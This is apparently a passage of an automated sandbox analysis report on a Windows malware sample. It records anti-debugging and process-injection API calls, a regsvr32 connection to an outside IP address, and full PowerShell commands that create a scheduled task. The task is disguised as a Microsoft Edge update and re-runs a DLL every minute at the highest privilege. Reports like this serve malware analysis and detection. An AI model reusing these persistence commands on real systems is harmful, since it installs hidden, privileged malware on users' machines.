Source: regsvr32.exe, 0000000E.00000003.1943562354.00000000046B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root PartitionlU
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisors
Source: regsvr32.exe, 0000000E.00000003.1916878513.0000000002D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor,
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual ProcessorZ
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionty
Source: regsvr32.exe, 00000007.00000003.1739937994.000000000287E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1741891317.000000000287E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02638678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02638678
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C855C30 CreateTimerQueue,CreateEventW,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,SetEvent,DeleteTimerQueue,7_2_6C855C30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,7_2_6C874C20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C856300 memset,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,7_2_6C856300
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02636530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep,7_2_02636530
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02638678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02638678
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_026369D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_026369D5
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_0263AFAE SetUnhandledExceptionFilter,7_2_0263AFAE
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 103.97.176.69 443Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02635830 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,7_2_02635830
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\eXIHsSYhOX.exe "C:\Users\user\Desktop\eXIHsSYhOX.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\burlysparrow.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{2f534156-472a-43d2-9350-94580b483ba3}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata\roaming\burlysparrow.dll\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{2f534156-472a-43d2-9350-94580b483ba3}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries) -runlevel highest"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
